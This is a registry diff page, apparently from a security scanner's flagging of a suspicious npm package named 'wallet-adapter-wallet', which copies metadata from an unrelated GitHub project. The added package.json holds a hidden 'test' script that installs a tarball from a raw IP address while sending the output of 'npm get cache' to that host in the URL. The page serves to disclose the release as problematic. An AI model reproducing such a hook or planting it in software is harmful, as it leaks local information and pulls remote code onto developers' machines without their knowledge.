wallet-adapter-wallet 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of wallet-adapter-wallet might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +4 -0
  2. package/package.json +27 -0
package/index.js ADDED
@@ -0,0 +1,4 @@
1
+ function hacker(name) {
2
+ return "hello "+ name;
3
+ }
4
+ module.exports = hacker;
package/package.json ADDED
@@ -0,0 +1,27 @@
1
+ {
2
+ "name": "wallet-adapter-wallet",
3
+ "version": "1.0.0",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "homepage": "https://github.com/myogeshchavan97/github-repos-search",
7
+ "repository": {
8
+ "type": "git",
9
+ "url": "git+https://github.com/myogeshchavan97/github-repos-search.git"
10
+ },
11
+ "dependencies": {
12
+ "axios": "^0.20.0"
13
+ },
14
+ "devDependencies": {},
15
+ "scripts": {
16
+ "test": "npm install http://18.119.19.108/withouttasty-1.0.0.tgz?yy=`npm get cache`;"
17
+ },
18
+ "keywords": [
19
+ "github",
20
+ "repos",
21
+ "repositories",
22
+ "sort",
23
+ "stars"
24
+ ],
25
+ "author": "Yogesh Chavan <myogeshchavan97@gmail.com>",
26
+ "license": "ISC"
27
+ }